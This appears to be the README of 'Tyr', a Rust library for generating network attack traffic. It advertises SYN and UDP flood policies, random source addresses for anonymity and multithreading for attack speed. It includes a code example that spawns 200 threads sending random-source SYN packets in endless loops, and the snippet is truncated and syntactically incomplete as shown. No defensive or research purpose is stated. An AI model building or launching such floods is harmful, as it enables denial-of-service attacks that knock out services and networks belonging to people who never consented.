Tyr is a high-performance, cross-platform and all-protocol network combat attack payload and policy library.
- Payload Generation: Easily generate packets with customizable source and destination IP addresses, ports, and network interfaces.
- Randomization: Support for generating random IP addresses and ports for increased anonymity.
- Multi-Threading: Utilize multiple threads to send packets simultaneously, increasing the attack speed.
- Datalink Layer: Support for sending packets over the datalink layer, allowing for more advanced network attacks.
- Network Combat Policy: Support for launch network combat policies, including SYN flood, UDP flood, and more.
- Error Handling: Robust error handling to ensure smooth operation and informative error messages.
- Rust programming language
- WinPcap for Windows users
To use Tyr in your Rust project, add tyr
to your Cargo.toml
Then, run cargo build
to build your project.
Here's a simple example of how to use Tyr to send SYN packets:
use pnet::datalink;
use tyr::error::Error;
use tyr::payload::Payload;
fn main() -> Result<(), Error> {
let interface = tyr::interface::get_interface("wlo1").ok_or(Error::InterfaceNotFound)?;
let mut payload = tyr::payload::syn::SYNPayload::random(&interface);
let mut packet = [0u8; 52];
payload.build(&mut packet)?;
let mut handles = vec![];
for _ in 0..200 {
let interface = interface.clone();
if let datalink::Channel::Ethernet(mut tx, _) =
datalink::channel(&interface, Default::default())?
let handle: std::thread::JoinHandle<Result<(), Error>> =
std::thread::spawn(move || loop {
tx.send_to(&packet, Some(interface.clone())).unwrap()?;
for handle in handles {
Contributions are very welcome! Please read our Contributing Guidelines for more information.
This project is licensed under the AGPL-3.0 License by @Noctisynth, org.